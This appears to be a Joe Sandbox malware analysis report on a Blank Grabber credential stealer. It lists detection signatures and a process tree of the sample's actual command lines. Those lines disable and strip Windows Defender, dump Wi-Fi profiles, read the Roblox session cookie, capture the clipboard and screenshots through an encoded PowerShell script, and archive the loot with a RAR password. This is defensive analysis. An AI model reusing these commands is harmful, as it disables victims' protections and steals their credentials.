Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U202f#U202f#U2005#U00a0.scr.exe

Overview

General Information

Sample name:#U202f#U202f#U2005#U00a0.scr.exe
renamed because original name is a hash value
Original sample name:.scr.exe
Analysis ID:1487425
MD5:d87b402b821fa842d89283aa8654d9c0
SHA1:30c086651e1bcd191163c01efbab55f51ec04691
SHA256:791a66abbd58ac34dc72565455fb6e596bb14b93aa5b0109e0d53c60b87b5678
Tags:exe
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses an obfuscated file name to hide its real file extension (RTLO)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Very long command line found
Writes or reads registry keys via WMI
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • #U202f#U202f#U2005#U00a0.scr.exe (PID: 1788 cmdline: "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe" MD5: D87B402B821FA842D89283AA8654D9C0)
    • #U202f#U202f#U2005#U00a0.scr.exe (PID: 5260 cmdline: "C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe" MD5: D87B402B821FA842D89283AA8654D9C0)
      • cmd.exe (PID: 4432 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6640 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 744 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2860 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7480 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 6112 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2672 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 6000 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7376 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 5556 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7296 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 6524 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7320 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 6844 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7312 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7176 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7364 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7540 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7668 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7592 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7692 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7616 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 7860 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 7748 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7876 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7756 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7908 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 8120 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 8152 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp" "c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8176 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 3924 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8184 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 3652 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 7684 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7472 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7448 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7576 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7712 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7212 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7064 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7480 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7828 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7904 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7620 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 7616 cmdline: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 8132 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 1568 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
